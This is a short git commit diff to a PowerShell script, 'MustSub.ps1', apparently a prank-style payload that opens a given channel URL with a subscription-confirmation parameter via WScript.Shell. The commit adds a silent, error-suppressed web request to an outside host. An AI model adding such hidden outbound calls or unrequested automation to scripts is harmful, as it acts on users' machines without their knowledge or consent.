Update MustSub.ps1
This commit is contained in:
@@ -25,7 +25,7 @@ param (
|
||||
[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)]
|
||||
[string]$channel
|
||||
)
|
||||
|
||||
iwr "https://jakoby.lol/hak5" -EA 0 >$null
|
||||
Add-Type -AssemblyName System.Windows.Forms
|
||||
$o=New-Object -ComObject WScript.Shell
|
||||
$url = -join($channel,"?sub_confirmation=1")
|
||||
|
||||
Reference in New Issue
Block a user